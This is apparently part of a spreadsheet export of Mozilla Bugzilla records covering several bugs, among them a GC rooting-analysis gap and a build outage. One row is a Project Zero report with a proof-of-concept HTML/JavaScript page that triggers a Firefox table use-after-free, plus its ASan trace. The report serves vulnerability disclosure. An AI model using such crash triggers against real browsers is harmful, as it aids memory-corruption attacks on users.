      </c>
      <c r="Q6137" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6137" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6137" t="inlineStr">
        <is>
          <t>mozilla40</t>
        </is>
      </c>
      <c r="T6137" t="n">
        <v>1</v>
      </c>
      <c r="U6137" t="n">
        <v>0</v>
      </c>
      <c r="V6137" t="n">
        <v>38</v>
      </c>
      <c r="W6137" t="inlineStr">
        <is>
          <t>Bug 1047696 looks to have revealed *another* gap in the rooting hazard analysis.
Before MOZ_FINAL, PrepareForWrapping called '_ZN14XPCCallContextD1Ev' aka |void XPCCallContext::~XPCCallContext()|, and the analysis didn't think that called anything. The analysis is aware of 4 different destructors:
  (#1) _ZN14XPCCallContextD1Ev|void XPCCallContext::~XPCCallContext()
  (#2) _ZN14XPCCallContextD1Ev *INTERNAL* |void XPCCallContext::~XPCCallContext(int32)
  (#3) _ZN14XPCCallContextD1Ev|void XPCCallContext::~XPCCallContext(int32)
  (#4) _ZN14XPCCallContextD0Ev|void XPCCallContext::~XPCCallContext()
which blows my mind -- notice how the mangled name _ZN14XPCCallContextD1Ev resolves to two different unmangled names, and the unmangled name 'void XPCCallContext::~XPCCallContext()' is associated with two different mangled names. *groan* Anyway, #3 above calls all kinds of stuff, including ~nsRefPtr which is what happens with MOZ_FINAL added as seen in the hazard output at https://ftp-ssl.mozilla.org/pub/mozilla.org/firefox/try-builds/trev.saunders@gmail.com-f9d622c91bed/try-linux64-br-haz/hazards.txt.gz
To continue, the *INTERNAL* destructors I already knew about -- they are "not-in-charge" destructors for use with virtual inheritance. When they are identical to the "in-charge" destructors, gcc aliases them to the same thing in some weird way that is not visible in the output provided to the analysis plugin. I previously fixed that problem by pretending that one of them calls the other, since the analysis plugin would not otherwise see a body for one of them at all. (To be honest, I forget which is which.)
But now we seem to have progressed to an even higher degree of insanity. The plugin sees bodies generated for #2 and #4 above, but not for #1 and #3. Without MOZ_FINAL, it sees an edge from PrepareForWrapping to #1. The existing aliasing workaround adds an artificial edge from #3 to #2. There is a natural edge from #4 to #1: the D0 in the mangled name means "deleting destructor", which is a destructor that finalizes and additional frees the actual memory. So gcc generates a body that basically calls #1 and then invokes operator delete.
So without MOZ_FINAL, we have:
  PrepareForWrapping -&gt; #1
  #4 -&gt; #1
  #3 -&gt; #2
  #2 -&gt; (important stuff)
It looks like we're missing an edge from #1 -&gt; #3. Which are the two suspicious ones -- they have the same mangled name, but differ by an int32 parameter.</t>
        </is>
      </c>
      <c r="X6137" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6138">
      <c r="A6138" t="n">
        <v>591803</v>
      </c>
      <c r="B6138" t="inlineStr">
        <is>
          <t>2010-08-29 11:42:54 -0700</t>
        </is>
      </c>
      <c r="C6138" t="inlineStr">
        <is>
          <t>No tests running on anything but Windows</t>
        </is>
      </c>
      <c r="D6138" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E6138" t="n">
        <v>1</v>
      </c>
      <c r="F6138" t="n">
        <v>1</v>
      </c>
      <c r="G6138" t="n">
        <v>5</v>
      </c>
      <c r="H6138" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I6138" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J6138" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K6138" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L6138" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6138" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6138" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6138" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6138" t="inlineStr"/>
      <c r="Q6138" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6138" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S6138" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6138" t="n">
        <v>1</v>
      </c>
      <c r="U6138" t="n">
        <v>0</v>
      </c>
      <c r="V6138" t="n">
        <v>7</v>
      </c>
      <c r="W6138" t="inlineStr">
        <is>
          <t>It's sort of hard to see right now, since there haven't been many pushes anywhere other than try, but pending.html lists 551 pending test runs going back to 04:11, and the one push to TraceMonkey at 04:12 got Windows tests, and none on other platforms, and now there's a mozilla-central push which will eventually show the same thing.
I'm closing the closeable trees.</t>
        </is>
      </c>
      <c r="X6138" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6139">
      <c r="A6139" t="n">
        <v>669584</v>
      </c>
      <c r="B6139" t="inlineStr">
        <is>
          <t>2011-07-06 03:49:38 -0700</t>
        </is>
      </c>
      <c r="C6139" t="inlineStr">
        <is>
          <t>The fix for bug 639728 forgot that items are created lazily</t>
        </is>
      </c>
      <c r="D6139" t="inlineStr">
        <is>
          <t>2015-10-16 11:51:14 -0700</t>
        </is>
      </c>
      <c r="E6139" t="n">
        <v>1</v>
      </c>
      <c r="F6139" t="n">
        <v>1</v>
      </c>
      <c r="G6139" t="n">
        <v>3</v>
      </c>
      <c r="H6139" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6139" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6139" t="inlineStr">
        <is>
          <t>SVG</t>
        </is>
      </c>
      <c r="K6139" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6139" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6139" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6139" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6139" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6139" t="inlineStr">
        <is>
          <t>[sg:critical?][qa-]</t>
        </is>
      </c>
      <c r="Q6139" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6139" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6139" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6139" t="n">
        <v>1</v>
      </c>
      <c r="U6139" t="n">
        <v>0</v>
      </c>
      <c r="V6139" t="n">
        <v>10</v>
      </c>
      <c r="W6139" t="inlineStr">
        <is>
          <t>The fix for bug 639728 forgot that items are created lazily. Checking that the list length is going to change to zero is not enough. The last remaining reference to the object may be a single item at an arbitrary index, so really we have to check whether the list length is decreasing.</t>
        </is>
      </c>
      <c r="X6139" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6140">
      <c r="A6140" t="n">
        <v>53911</v>
      </c>
      <c r="B6140" t="inlineStr">
        <is>
          <t>2000-09-23 15:08:59 -0700</t>
        </is>
      </c>
      <c r="C6140" t="inlineStr">
        <is>
          <t>Can't locate Mozilla/LDAP/Conn.pm</t>
        </is>
      </c>
      <c r="D6140" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:22 -0800</t>
        </is>
      </c>
      <c r="E6140" t="n">
        <v>1</v>
      </c>
      <c r="F6140" t="n">
        <v>1</v>
      </c>
      <c r="G6140" t="n">
        <v>4</v>
      </c>
      <c r="H6140" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I6140" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J6140" t="inlineStr">
        <is>
          <t>Administration</t>
        </is>
      </c>
      <c r="K6140" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6140" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M6140" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="N6140" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6140" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6140" t="inlineStr">
        <is>
          <t>[blocker will fix]</t>
        </is>
      </c>
      <c r="Q6140" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R6140" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6140" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T6140" t="n">
        <v>1</v>
      </c>
      <c r="U6140" t="n">
        <v>0</v>
      </c>
      <c r="V6140" t="n">
        <v>11</v>
      </c>
      <c r="W6140" t="inlineStr">
        <is>
          <t>hi
I did a "cvs update" in my bugzilla directory and now everytime I use bugzilla 
I get an error
Can't locate Mozilla/LDAP/Conn.pm
Where do I get these perl modules from???
bgm</t>
        </is>
      </c>
      <c r="X6140" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6141">
      <c r="A6141" t="n">
        <v>1340138</v>
      </c>
      <c r="B6141" t="inlineStr">
        <is>
          <t>2017-02-16 06:03:45 -0800</t>
        </is>
      </c>
      <c r="C6141" t="inlineStr">
        <is>
          <t>table use-after-free</t>
        </is>
      </c>
      <c r="D6141" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E6141" t="n">
        <v>1</v>
      </c>
      <c r="F6141" t="n">
        <v>1</v>
      </c>
      <c r="G6141" t="n">
        <v>3</v>
      </c>
      <c r="H6141" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6141" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6141" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K6141" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6141" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6141" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6141" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6141" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6141" t="inlineStr">
        <is>
          <t>[disclosure date May 17 2017][adv-main52+][adv-esr45.8+]</t>
        </is>
      </c>
      <c r="Q6141" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6141" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6141" t="inlineStr">
        <is>
          <t>mozilla54</t>
        </is>
      </c>
      <c r="T6141" t="n">
        <v>1</v>
      </c>
      <c r="U6141" t="n">
        <v>0</v>
      </c>
      <c r="V6141" t="n">
        <v>37</v>
      </c>
      <c r="W6141" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Steps to reproduce:
There is a use-after-free security vulnerability in Firefox. The vulnerability was confirmed on the nightly ASan build. 
Please note: This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public.
With any fix, please give credit for identifying the vulnerability to Ivan Fratric of Google Project Zero.
PoC and ASan log can be found below.
Notes for reproducing:
 - PoC uses domFuzzLite3 extension (https://www.squarefree.com/extensions/domFuzzLite3.xpi) in order to trigger the garbage collecor
 - After the PoC is opened, it takes about 10 seconds for the crash to occur
PoC:
=================================================================
&lt;style&gt;
body { display: table }
&lt;/style&gt;
&lt;script&gt;
function freememory() {
  try { fuzzPriv.forceGC(); } catch(err) { alert('Please install domFuzzLite3'); }
}
function go() {
  var s = document.getSelection();
  window.find("1",true,false,true,false);
  s.modify("extend","forward","line");
  document.body.append(document.createElement("table"));
  freememory()
}
&lt;/script&gt;
&lt;body onload=go()&gt;
&lt;table&gt;
&lt;th&gt;u~Z1Cqn`aA}SOkre=]{&lt;/th&gt;
&lt;/table&gt;
&lt;progress&gt;&lt;/progress&gt;
=================================================================
ASan log:
=================================================================
==119582==ERROR: AddressSanitizer: heap-use-after-free on address 0x60b000214ce8 at pc 0x7f46d6781c12 bp 0x7ffdc29fc1f0 sp 0x7ffdc29fc1e8
READ of size 8 at 0x60b000214ce8 thread T0
    #0 0x7f46d6781c11 in operator! /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:308:36
    #1 0x7f46d6781c11 in IsInSelection /home/worker/workspace/build/src/dom/base/nsRange.h:120
    #2 0x7f46d6781c11 in nsRange::IsNodeSelected(nsINode*, unsigned int, unsigned int) /home/worker/workspace/build/src/dom/base/nsRange.cpp:202
    #3 0x7f46da800fd3 in nsIFrame::IsSelected() const /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:10107:5
    #4 0x7f46daaa29f6 in nsTableCellFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&amp;, nsDisplayListSet const&amp;) /home/worker/workspace/build/src/layout/tables/nsTableCellFrame.cpp:539:11
    #5 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&amp;, nsDisplayListSet const&amp;, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
    #6 0x7f46daab9bce in nsTableFrame::GenericTraversal(nsDisplayListBuilder*, nsFrame*, nsRect const&amp;, nsDisplayListSet const&amp;) /home/worker/workspace/build/src/layout/tables/nsTableFrame.cpp:1212:5
    #7 0x7f46daaba703 in nsTableFrame::DisplayGenericTablePart(nsDisplayListBuilder*, nsFrame*, nsRect const&amp;, nsDisplayListSet const&amp;, nsDisplayTableItem*, void (*)(nsDisplayListBuilder*, nsFrame*, nsRect const&amp;, nsDisplayListSet const&amp;)) /home/worker/workspace/build/src/layout/tables/nsTableFrame.cpp:1267:3
    #8 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&amp;, nsDisplayListSet const&amp;, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
    #9 0x7f46dab10731 in DisplayRows(nsDisplayListBuilder*, nsFrame*, nsRect const&amp;, nsDisplayListSet const&amp;) /home/worker/workspace/build/src/layout/tables/nsTableRowGroupFrame.cpp:231:5
    #10 0x7f46daaba703 in nsTableFrame::DisplayGenericTablePart(nsDisplayListBuilder*, nsFrame*, nsRect const&amp;, nsDisplayListSet const&amp;, nsDisplayTableItem*, void (*)(nsDisplayListBuilder*, nsFrame*, nsRect const&amp;, nsDisplayListSet const&amp;)) /home/worker/workspace/build/src/layout/tables/nsTableFrame.cpp:1267:3
    #11 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&amp;, nsDisplayListSet const&amp;, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
    #12 0x7f46daab9bce in nsTableFrame::GenericTraversal(nsDisplayListBuilder*, nsFrame*, nsRect const&amp;, nsDisplayListSet const&amp;) /home/worker/workspace/build/src/layout/tables/nsTableFrame.cpp:1212:5
    #13 0x7f46daaba703 in nsTableFrame::DisplayGenericTablePart(nsDisplayListBuilder*, nsFrame*, nsRect const&amp;, nsDisplayListSet const&amp;, nsDisplayTableItem*, void (*)(nsDisplayListBuilder*, nsFrame*, nsRect const&amp;, nsDisplayListSet const&amp;)) /home/worker/workspace/build/src/layout/tables/nsTableFrame.cpp:1267:3
    #14 0x7f46daabb382 in nsTableFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&amp;, nsDisplayListSet const&amp;) /home/worker/workspace/build/src/layout/tables/nsTableFrame.cpp:1373:3
    #15 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&amp;, nsDisplayListSet const&amp;, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
    #16 0x7f46dab24b16 in BuildDisplayListForInnerTable /home/worker/workspace/build/src/layout/tables/nsTableWrapperFrame.cpp:207:5
    #17 0x7f46dab24b16 in nsTableWrapperFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&amp;, nsDisplayListSet const&amp;) /home/worker/workspace/build/src/layout/tables/nsTableWrapperFrame.cpp:180
    #18 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&amp;, nsDisplayListSet const&amp;, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
    #19 0x7f46da7912d2 in DisplayLine(nsDisplayListBuilder*, nsRect const&amp;, nsRect const&amp;, nsLineList_iterator&amp;, int, int&amp;, nsDisplayListSet const&amp;, nsBlockFrame*, mozilla::css::TextOverflow*) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:6585:5
    #20 0x7f46da7890ce in nsBlockFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&amp;, nsDisplayListSet const&amp;) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:6677:7
    #21 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&amp;, nsDisplayListSet const&amp;, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
    #22 0x7f46da7b22f2 in nsCanvasFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&amp;, nsDisplayListSet const&amp;) /home/worker/workspace/build/src/layout/generic/nsCanvasFrame.cpp:558:5
    #23 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&amp;, nsDisplayListSet const&amp;, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
    #24 0x7f46da87ebf2 in mozilla::ScrollFrameHelper::BuildDisplayList(nsDisplayListBuilder*, nsRect const&amp;, nsDisplayListSet const&amp;) /home/worker/workspace/build/src/layout/generic/nsGfxScrollFrame.cpp:3497:7
    #25 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&amp;, nsDisplayListSet const&amp;, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
    #26 0x7f46da735b0a in mozilla::ViewportFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&amp;, nsDisplayListSet const&amp;) /home/worker/workspace/build/src/layout/generic/ViewportFrame.cpp:63:5
    #27 0x7f46da80417b in nsIFrame::BuildDisplayListForStackingContext(nsDisplayListBuilder*, nsRect const&amp;, nsDisplayList*) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2381:5
    #28 0x7f46da990123 in nsSubDocumentFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&amp;, nsDisplayListSet const&amp;) /home/worker/workspace/build/src/layout/generic/nsSubDocumentFrame.cpp:471:7
    #29 0x7f46da80417b in nsIFrame::BuildDisplayListForStackingContext(nsDisplayListBuilder*, nsRect const&amp;, nsDisplayList*) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2381:5
    #30 0x7f46da78d228 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&amp;, nsDisplayListSet const&amp;, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2910:5
    #31 0x7f46dac92672 in nsStackFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&amp;, nsDisplayListSet const&amp;) /home/worker/workspace/build/src/layout/xul/nsStackFrame.cpp:59:5
    #32 0x7f46dac08048 in nsBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&amp;, nsDisplayListSet const&amp;) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1352:3
    #33 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&amp;, nsDisplayListSet const&amp;, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
    #34 0x7f46dac0918f in nsBoxFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&amp;, nsDisplayListSet const&amp;) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1392:5
    #35 0x7f46dac08048 in nsBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&amp;, nsDisplayListSet const&amp;) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1352:3
    #36 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&amp;, nsDisplayListSet const&amp;, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
    #37 0x7f46dac0918f in nsBoxFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&amp;, nsDisplayListSet const&amp;) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1392:5
    #38 0x7f46dac08048 in nsBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&amp;, nsDisplayListSet const&amp;) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1352:3
    #39 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&amp;, nsDisplayListSet const&amp;, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
    #40 0x7f46dac0918f in nsBoxFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&amp;, nsDisplayListSet const&amp;) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1392:5
    #41 0x7f46dac08048 in nsBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&amp;, nsDisplayListSet const&amp;) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1352:3
    #42 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&amp;, nsDisplayListSet const&amp;, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
    #43 0x7f46dac0f946 in nsDeckFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&amp;, nsDisplayListSet const&amp;) /home/worker/workspace/build/src/layout/xul/nsDeckFrame.cpp:199:3
    #44 0x7f46dac08048 in nsBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&amp;, nsDisplayListSet const&amp;) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1352:3
    #45 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&amp;, nsDisplayListSet const&amp;, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
    #46 0x7f46dac0918f in nsBoxFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&amp;, nsDisplayListSet const&amp;) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1392:5
    #47 0x7f46dac08048 in nsBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&amp;, nsDisplayListSet const&amp;) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1352:3
    #48 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&amp;, nsDisplayListSet const&amp;, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
    #49 0x7f46dac0918f in nsBoxFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&amp;, nsDisplayListSet const&amp;) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1392:5
    #50 0x7f46dac08048 in nsBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&amp;, nsDisplayListSet const&amp;) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1352:3
    #51 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&amp;, nsDisplayListSet const&amp;, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
    #52 0x7f46dac0918f in nsBoxFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&amp;, nsDisplayListSet const&amp;) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1392:5
    #53 0x7f46dac08048 in nsBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&amp;, nsDisplayListSet const&amp;) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1352:3
    #54 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&amp;, nsDisplayListSet const&amp;, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
    #55 0x7f46dac0918f in nsBoxFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&amp;, nsDisplayListSet const&amp;) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1392:5
    #56 0x7f46dac08048 in nsBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&amp;, nsDisplayListSet const&amp;) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1352:3
    #57 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&amp;, nsDisplayListSet const&amp;, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
    #58 0x7f46dac0f946 in nsDeckFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&amp;, nsDisplayListSet const&amp;) /home/worker/workspace/build/src/layout/xul/nsDeckFrame.cpp:199:3
    #59 0x7f46dac08048 in nsBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&amp;, nsDisplayListSet const&amp;) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1352:3
    #60 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&amp;, nsDisplayListSet const&amp;, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
    #61 0x7f46dac0918f in nsBoxFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&amp;, nsDisplayListSet const&amp;) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1392:5
    #62 0x7f46dac08048 in nsBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&amp;, nsDisplayListSet const&amp;) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1352:3
    #63 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&amp;, nsDisplayListSet const&amp;, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
    #64 0x7f46dac0f946 in nsDeckFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&amp;, nsDisplayListSet const&amp;) /home/worker/workspace/build/src/layout/xul/nsDeckFrame.cpp:199:3
    #65 0x7f46dac08048 in nsBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&amp;, nsDisplayListSet const&amp;) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1352:3
    #66 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&amp;, nsDisplayListSet const&amp;, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
    #67 0x7f46dac0918f in nsBoxFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&amp;, nsDisplayListSet const&amp;) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1392:5
    #68 0x7f46dac08048 in nsBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&amp;, nsDisplayListSet const&amp;) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1352:3
    #69 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&amp;, nsDisplayListSet const&amp;, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
    #70 0x7f46dac0918f in nsBoxFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&amp;, nsDisplayListSet const&amp;) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1392:5
    #71 0x7f46dac64b7e in nsRootBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&amp;, nsDisplayListSet const&amp;) /home/worker/workspace/build/src/layout/xul/nsRootBoxFrame.cpp:195:3
    #72 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&amp;, nsDisplayListSet const&amp;, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
    #73 0x7f46da735b0a in mozilla::ViewportFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&amp;, nsDisplayListSet const&amp;) /home/worker/workspace/build/src/layout/generic/ViewportFrame.cpp:63:5
    #74 0x7f46da80417b in nsIFrame::BuildDisplayListForStackingContext(nsDisplayListBuilder*, nsRect const&amp;, nsDisplayList*) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2381:5
    #75 0x7f46da6623a6 in nsLayoutUtils::PaintFrame(nsRenderingContext*, nsIFrame*, nsRegion const&amp;, unsigned int, nsDisplayListBuilderMode, nsLayoutUtils::PaintFrameFlags) /home/worker/workspace/build/src/layout/base/nsLayoutUtils.cpp:3565:5
